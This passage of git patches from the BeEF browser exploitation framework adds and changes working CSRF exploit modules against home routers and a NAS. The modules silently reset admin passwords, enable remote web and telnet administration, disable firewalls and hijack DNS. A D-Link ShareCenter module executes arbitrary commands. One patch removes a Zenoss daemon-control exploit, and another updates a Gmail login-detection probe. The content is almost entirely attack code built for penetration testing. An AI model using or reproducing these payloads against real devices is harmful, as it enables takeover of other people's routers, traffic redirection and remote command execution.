-    document.body.removeChild(dsl500t_iframe);
+    document.body.removeChild(dsl500t_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js
index 9ce6b9f2e..09667bd04 100644
--- a/modules/exploits/router/huawei_smartax_mt880/command.js
+++ b/modules/exploits/router/huawei_smartax_mt880/command.js
@@ -5,19 +5,20 @@
 //
 
 beef.execute(function() {
-  var gateway = '<%= @base %>'; 
+  var gateway  = '<%= @base %>'; 
   var username = '<%= @username %>';
-  var passwd = '<%= @password %>';
+  var passwd   = '<%= @password %>';
+  var timeout  = 15;
 
-  var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
-  huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
+  var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(huawei_smartax_mt880_iframe);
+    document.body.removeChild(huawei_smartax_mt880_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/linksys_befsr41_csrf/command.js b/modules/exploits/router/linksys_befsr41_csrf/command.js
index 6580abf95..60cee7e6c 100644
--- a/modules/exploits/router/linksys_befsr41_csrf/command.js
+++ b/modules/exploits/router/linksys_befsr41_csrf/command.js
@@ -5,15 +5,17 @@
 //
 
 beef.execute(function() {
+  var timeout = 15;
+
+  var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
 
-  var befsr41_iframe = beef.dom.createInvisibleIframe();
-  befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(befsr41_iframe);
+    document.body.removeChild(befsr41_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/command.js b/modules/exploits/router/linksys_wrt54g2_csrf/command.js
index 3eb5248e8..5b1097a45 100644
--- a/modules/exploits/router/linksys_wrt54g2_csrf/command.js
+++ b/modules/exploits/router/linksys_wrt54g2_csrf/command.js
@@ -5,11 +5,12 @@
 //
 
 beef.execute(function() {
-  var port = '<%= @port %>';
+  var port    = '<%= @port %>';
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
+  var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
       [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
        {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
        {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},
@@ -27,9 +28,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(wrt54g2_iframe);
+    document.body.removeChild(wrt54g2_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/linksys_wrt54g_csrf/command.js b/modules/exploits/router/linksys_wrt54g_csrf/command.js
index c235e32a2..668315b6e 100644
--- a/modules/exploits/router/linksys_wrt54g_csrf/command.js
+++ b/modules/exploits/router/linksys_wrt54g_csrf/command.js
@@ -5,31 +5,33 @@
 //
 
 beef.execute(function() {
-  var port = '<%= @port %>';
+  var port    = '<%= @port %>';
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
-      [{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
-          {'type':'hidden', 'name':'http_enable', 'value':'1'},
-          {'type':'hidden', 'name':'https_enable', 'value':'0'},
-          {'type':'hidden', 'name':'PasswdModify', 'value':'1'},
-          {'type':'hidden', 'name':'http_passwd', 'value':passwd},
+  var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
+      [
+          {'type':'hidden', 'name':'remote_mgt_https',   'value':'0'} ,
+          {'type':'hidden', 'name':'http_enable',        'value':'1'},
+          {'type':'hidden', 'name':'https_enable',       'value':'0'},
+          {'type':'hidden', 'name':'PasswdModify',       'value':'1'},
+          {'type':'hidden', 'name':'http_passwd',        'value':passwd},
           {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
-          {'type':'hidden', 'name':'_http_enable', 'value':'1'},
-          {'type':'hidden', 'name':'remote_management', 'value':'1'},
-          {'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
-          {'type':'hidden', 'name':'http_wanport', 'value':port},
-          {'type':'hidden', 'name':'upnp_enable', 'value':'1'},
-          {'type':'hidden', 'name':'layout', 'value':'en'}
+          {'type':'hidden', 'name':'_http_enable',       'value':'1'},
+          {'type':'hidden', 'name':'remote_management',  'value':'1'},
+          {'type':'hidden', 'name':'web_wl_filter',      'value':'1'},
+          {'type':'hidden', 'name':'http_wanport',       'value':port},
+          {'type':'hidden', 'name':'upnp_enable',        'value':'1'},
+          {'type':'hidden', 'name':'layout',             'value':'en'}
       ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(wrt54g_iframe);
+    document.body.removeChild(wrt54g_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js
index ca60fc0e9..5c5e94b94 100644
--- a/modules/exploits/router/virgin_superhub_csrf/command.js
+++ b/modules/exploits/router/virgin_superhub_csrf/command.js
@@ -9,30 +9,31 @@ beef.execute(function() {
 	var gateway = '<%= @base %>'; 
 	var passwd  = '<%= @password %>';
 	var port    = '<%= @port %>';
+	var timeout = 15;
 
-	var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
-		{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
+	var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
+		{'type':'hidden', 'name':'NetgearPassword',        'value':passwd},
 		{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
-		{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
+		{'type':'hidden', 'name':'RestoreFactoryNo',       'value':'0x00'}
 	]);
 
-	var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
-		{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
+	var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
+		{'type':'hidden', 'name':'cbPortScanDetection',    'value':''}
 	]);
 
-	var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
-		{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
-		{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
+	var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
+		{'type':'hidden', 'name':'NetgearVMRmEnable',      'value':'0x01'},
+		{'type':'hidden', 'name':'NetgearVMRmPortNumber',  'value':port}
 	]);
 
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 	cleanup = function() {
-		document.body.removeChild(virgin_superhub_iframe1);
-		document.body.removeChild(virgin_superhub_iframe2);
-		document.body.removeChild(virgin_superhub_iframe3);
+		document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>);
+		document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>);
+		document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>);
 	}
-	setTimeout("cleanup()", 15000);
+	setTimeout("cleanup()", timeout*1000);
 
 });
 

From 61e63370467fd81032a74be2360cbdafd725793f Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 27 May 2013 12:14:27 +0930
Subject: [PATCH 315/397] Remove zenoss_daemon_csrf module

---
 .../exploits/zenoss_daemon_csrf/command.js    | 23 -------
 .../exploits/zenoss_daemon_csrf/config.yaml   | 15 -----
 modules/exploits/zenoss_daemon_csrf/module.rb | 60 -------------------
 3 files changed, 98 deletions(-)
 delete mode 100644 modules/exploits/zenoss_daemon_csrf/command.js
 delete mode 100644 modules/exploits/zenoss_daemon_csrf/config.yaml
 delete mode 100644 modules/exploits/zenoss_daemon_csrf/module.rb

diff --git a/modules/exploits/zenoss_daemon_csrf/command.js b/modules/exploits/zenoss_daemon_csrf/command.js
deleted file mode 100644
index 7b90a1a88..000000000
--- a/modules/exploits/zenoss_daemon_csrf/command.js
+++ /dev/null
@@ -1,23 +0,0 @@
-//
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-beef.execute(function() {
-  var base = '<%= @base %>'; 
-  var service = '<%= @service %>';
-  var action = '<%= @action %>';
-
-  var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
-  zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
-
-  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
-
-  cleanup = function() {
-    document.body.removeChild(zenoss_daemon_iframe);
-  }
-  setTimeout("cleanup()", 15000);
-
-});
-
diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml
deleted file mode 100644
index c93db9f5b..000000000
--- a/modules/exploits/zenoss_daemon_csrf/config.yaml
+++ /dev/null
@@ -1,15 +0,0 @@
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-beef:
-    module:
-        zenoss_daemon_csrf:
-            enable: true
-            category: "Exploits"
-            name: "Zenoss 3.x Daemon CSRF"
-            description: "Attempts to start/stop/restart daemons on a Zenoss Core 3.x server."
-            authors: ["bcoles"]
-            target:
-                working: ["ALL"]
diff --git a/modules/exploits/zenoss_daemon_csrf/module.rb b/modules/exploits/zenoss_daemon_csrf/module.rb
deleted file mode 100644
index eb9c642e1..000000000
--- a/modules/exploits/zenoss_daemon_csrf/module.rb
+++ /dev/null
@@ -1,60 +0,0 @@
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-class Zenoss_daemon_csrf < BeEF::Core::Command
-  
-	def self.options
-		return [
-			{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, 
-			{ 'name' => 'service',
-				'type' => 'combobox',
-				'ui_label' => 'Daemon',
-				'store_type' => 'arraystore',
-				'store_fields' => ['service', 'description'],
-				'store_data' => [
-					['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'],
-					['zopectl', 'zopectl (The Zope open source web application server)'],
-					['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'],
-					['zenjobs', 'zenjobs (Zenjobs)'],
-					['zenping', 'zenping (ICMP ping status monitoring)'],
-					['zensyslog', 'zensyslog (Collection of and classification of syslog events)'],
-					['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'],
-					['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'],
-					['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'],
-					['zenmodeler', 'zenmodeler (Configuration collection and configuration)'],
-					['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'],
-					['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'],
-					['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'],
-					['zenwin', 'zenwin (Windows Service Monitoring (WMI))'],
-					['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'],
-					['zenjmx', 'zenjmx (ZenJMX)']
-				],
-				'emptyText' => 'Select a daemon',
-				'valueField' => 'service',
-				'displayField' => 'service', #'description',
-				'mode' => 'local',
-				'autoWidth' => true
-			},
-			{ 'name' => 'action',
-				'type' => 'combobox',
-				'ui_label' => 'Action',
-				'store_type' => 'arraystore',
-				'store_fields' => ['action'],
-				'store_data' => [
-					['Start'],['Stop'],['Restart']
-				],
-				'valueField' => 'action',
-				'displayField' => 'action',
-				'mode' => 'local',
-				'autoWidth' => true
-			}
-		]
-	end
-
-	def post_execute
-		save({'result' => @datastore['result']})
-	end
-
-end

From ff620d42f4031914a8370366e8fc9465f40302ee Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 27 May 2013 12:50:06 +0930
Subject: [PATCH 316/397] Add belkin_dns_csrf DNS hijack module

Part of issue #538
---
 .../router/belkin_dns_csrf/command.js         | 70 +++++++++++++++++++
 .../router/belkin_dns_csrf/config.yaml        | 15 ++++
 .../exploits/router/belkin_dns_csrf/module.rb | 21 ++++++
 3 files changed, 106 insertions(+)
 create mode 100644 modules/exploits/router/belkin_dns_csrf/command.js
 create mode 100644 modules/exploits/router/belkin_dns_csrf/config.yaml
 create mode 100644 modules/exploits/router/belkin_dns_csrf/module.rb

diff --git a/modules/exploits/router/belkin_dns_csrf/command.js b/modules/exploits/router/belkin_dns_csrf/command.js
new file mode 100644
index 000000000..1bea76e03
--- /dev/null
+++ b/modules/exploits/router/belkin_dns_csrf/command.js
@@ -0,0 +1,70 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// config
+	var gateway = '<%= @base %>'; 
+	var path    = '/cgi-bin/setup_dns.exe';
+	var dns     = '<%= @dns %>';
+	var timeout = 15;
+
+	// validate DNS server IP address
+	var parts = dns.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+			return;
+		}
+	}
+	var dns_1 = parts[0];
+	var dns_2 = parts[1];
+	var dns_3 = parts[2];
+	var dns_4 = parts[3];
+
+	// attempt auth with default password (admin)
+	// incorrect login attempts do not log out an authenticated session
+	var img = new Image();
+	img.setAttribute("style", "visibility:hidden");
+	img.setAttribute("width", "0");
+	img.setAttribute("height","0");
+	img.id = 'belkin_auth_<%= @command_id %>';
+	img.src = gateway+"/cgi-bin/login.exe?pws=admin";
+	document.body.appendChild(img);
+
+	// change DNS
+	var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", [
+		{'type':'hidden', 'name':'dns1_1',   'value':dns_1},
+		{'type':'hidden', 'name':'dns1_2',   'value':dns_2},
+		{'type':'hidden', 'name':'dns1_3',   'value':dns_3},
+		{'type':'hidden', 'name':'dns1_4',   'value':dns_4},
+		{'type':'hidden', 'name':'dns2_1',   'value':dns_1},
+		{'type':'hidden', 'name':'dns2_2',   'value':dns_2},
+		{'type':'hidden', 'name':'dns2_3',   'value':dns_3},
+		{'type':'hidden', 'name':'dns2_4',   'value':dns_4},
+		{'type':'hidden', 'name':'dns2_1_t', 'value':dns_1},
+		{'type':'hidden', 'name':'dns2_2_t', 'value':dns_2},
+		{'type':'hidden', 'name':'dns2_3_t', 'value':dns_3},
+		{'type':'hidden', 'name':'dns2_4_t', 'value':dns_4},
+		{'type':'hidden', 'name':'auto_from_isp', 'value':'0'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(belkin_iframe_<%= @command_id %>);
+		document.body.removeChild(belkin_auth_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/router/belkin_dns_csrf/config.yaml b/modules/exploits/router/belkin_dns_csrf/config.yaml
new file mode 100644
index 000000000..9e8a27612
--- /dev/null
+++ b/modules/exploits/router/belkin_dns_csrf/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        belkin_dns_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Belkin DNS Hijack CSRF"
+            description: "Attempts to change the DNS setting on a Belkin router.<br/><br/>Multiple models are affected, including F5D7230 and F1PI242EG, however this module has not been tested."
+            authors: ["bcoles"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/router/belkin_dns_csrf/module.rb b/modules/exploits/router/belkin_dns_csrf/module.rb
new file mode 100644
index 000000000..2418dbfe0
--- /dev/null
+++ b/modules/exploits/router/belkin_dns_csrf/module.rb
@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# This module has not been tested
+###
+class Belkin_dns_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
+			{'name' => 'dns', 'ui_label' => 'DNS Server', 'value' => '8.8.8.8'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

From 1dc59f7b014edf7b7595e6f2369192f95e5f2889 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 27 May 2013 13:50:12 +0930
Subject: [PATCH 317/397] Add D-Link ShareCenter command execution exploit
 module

---
 .../nas/dlink_sharecenter_cmd_exec/command.js | 27 +++++++++++++++++++
 .../dlink_sharecenter_cmd_exec/config.yaml    | 15 +++++++++++
 .../nas/dlink_sharecenter_cmd_exec/module.rb  | 23 ++++++++++++++++
 3 files changed, 65 insertions(+)
 create mode 100644 modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js
 create mode 100644 modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml
 create mode 100644 modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb

diff --git a/modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js b/modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js
new file mode 100644
index 000000000..ba11e3d10
--- /dev/null
+++ b/modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js
@@ -0,0 +1,27 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var path    = '/cgi-bin/system_mgr.cgi';
+	var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+	var timeout = 15;
+
+	var dlink_sharecenter_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+		{'type':'hidden', 'name':'cmd',      'value':'cgi_sms_test'},
+		{'type':'hidden', 'name':'command1', 'value':cmd}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(dlink_sharecenter_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml b/modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml
new file mode 100644
index 000000000..7738d32b2
--- /dev/null
+++ b/modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        dlink_sharecenter_cmd_exec:
+            enable: true
+            category: ["Exploits", "NAS"]
+            name: "D-Link ShareCenter Command Execution"
+            description: "Attempts to execute arbitrary commands on a D-Link ShareCenter NAS. Multiple models are affected, including DNS-320 and DNS-325, however this module has not been tested.<br/><br/>For more information see, http://blog.emaze.net/2012_02_01_archive.html"
+            authors: ["bcoles", "Roberto Paleari, Emaze Networks S.p.A."]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb b/modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb
new file mode 100644
index 000000000..7bdc07991
--- /dev/null
+++ b/modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb
@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# This module has not been tested. For more information see:
+# http://blog.emaze.net/2012_02_01_archive.html
+# http://www.securityfocus.com/archive/1/521532
+###
+class Dlink_sharecenter_cmd_exec < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name'=>'base', 'ui_label'=>'Router web root', 'value'=>'http://192.168.0.1/'},
+			{'name'=>'cmd',  'ui_label'=>'Command',         'value'=>'ls'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

From 9636cb09721230433e5189dcc4220ae8dbc5efe3 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Tue, 28 May 2013 20:34:56 +0800
Subject: [PATCH 318/397] Updated Gmail detection URL. Fixes #Issue 899

---
 modules/network/detect_soc_nets/command.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/network/detect_soc_nets/command.js b/modules/network/detect_soc_nets/command.js
index 409eb8c0c..d33d623c5 100644
--- a/modules/network/detect_soc_nets/command.js
+++ b/modules/network/detect_soc_nets/command.js
@@ -17,7 +17,7 @@ beef.execute(function() {
 	img.setAttribute("style","visibility:hidden");
 	img.setAttribute("width","0");
 	img.setAttribute("height","0");
-	img.src = 'https://mail.google.com/mail/photos/static/AD34hIiQyJTs5FhsJ1mhFdK9wx4OZU2AgLNZLBbk2zMHYPUfs-ZzXPLq2s2vdBmgnJ6SoUCeBbFnjRlPUDXw860gsEDSKPrhBJYDgDBCd7g36x2tuBQc0TM?'+ new Date();
+	img.src = 'https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD?'+ new Date();
 	img.id = 'gmailimg';
 	img.setAttribute("attr","start");
 	img.onerror = function() {

From f2efa533c8da56c80177cde99174790f69bdc89b Mon Sep 17 00:00:00 2001
From: James Otten <james_otten@lavabit.com>
Date: Thu, 30 May 2013 15:49:47 -0500
Subject: [PATCH 319/397] Added Actiontec Q1000 CSRF module

---
 .../router/actiontec_q1000_csrf/command.js    | 52 +++++++++++++++++++
 .../router/actiontec_q1000_csrf/config.yaml   | 15 ++++++
 .../router/actiontec_q1000_csrf/module.rb     | 21 ++++++++
 3 files changed, 88 insertions(+)
 create mode 100644 modules/exploits/router/actiontec_q1000_csrf/command.js
 create mode 100644 modules/exploits/router/actiontec_q1000_csrf/config.yaml
 create mode 100644 modules/exploits/router/actiontec_q1000_csrf/module.rb

diff --git a/modules/exploits/router/actiontec_q1000_csrf/command.js b/modules/exploits/router/actiontec_q1000_csrf/command.js
new file mode 100644
index 000000000..1a444473c
--- /dev/null
+++ b/modules/exploits/router/actiontec_q1000_csrf/command.js
@@ -0,0 +1,52 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var user    = '<%= @user %>';
+	var passwd  = '<%= @password %>';
+	var port    = '<%= @port %>';
+	var timeout = 15;
+
+	var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", [
+		{'type':'hidden', 'name':'serCtlHttp',          'value':'1'},
+		{'type':'hidden', 'name':'adminUserName',       'value':user},
+		{'type':'hidden', 'name':'adminPassword',       'value':passwd},
+		{'type':'hidden', 'name':'remGuiTimeout',       'value':'0'},
+		{'type':'hidden', 'name':'remGuiPort',          'value':port}
+	]);
+
+	var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", [
+		{'type':'hidden', 'name':'serCtlTelnet',        'value':'1'},
+		{'type':'hidden', 'name':'remTelUser',          'value':user},
+		{'type':'hidden', 'name':'remTelPass',          'value':passwd},
+		{'type':'hidden', 'name':'remTelTimeout',       'value':'0'},
+		{'type':'hidden', 'name':'remTelPassChanged',   'value':'1'}
+	]);
+
+	var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", [
+		{'type':'hidden', 'name':'fwLevel',             'value':'Basic'},
+		{'type':'hidden', 'name':'fwStealthMode',       'value':'0'}
+	]);
+
+	var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", [
+		{'type':'hidden', 'name':'ipv6_fwlevel',        'value':'basic'},
+		{'type':'hidden', 'name':'ipv6_fwenable',       'value':'0'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(actiontec_q1000_iframe1_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe2_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe3_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe4_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/router/actiontec_q1000_csrf/config.yaml b/modules/exploits/router/actiontec_q1000_csrf/config.yaml
new file mode 100644
index 000000000..be4b1634a
--- /dev/null
+++ b/modules/exploits/router/actiontec_q1000_csrf/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        actiontec_q1000_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Actiontec Q1000 CSRF"
+            description: "Attempts to enable remote web and telnet administration, and disables the firewall on an Actiontec Q1000 router."
+            authors: ["james-otten"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/router/actiontec_q1000_csrf/module.rb b/modules/exploits/router/actiontec_q1000_csrf/module.rb
new file mode 100644
index 000000000..40000e2e4
--- /dev/null
+++ b/modules/exploits/router/actiontec_q1000_csrf/module.rb
@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Actiontec_q1000_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
+			{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'admin'},
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => 'BeEF'},
+			{'name' => 'port', 'ui_label' => 'Desired web ui port', 'value' => '443'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

From 3c5b68e112cd18bcdf5d15d29d5de9a31da891b7 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
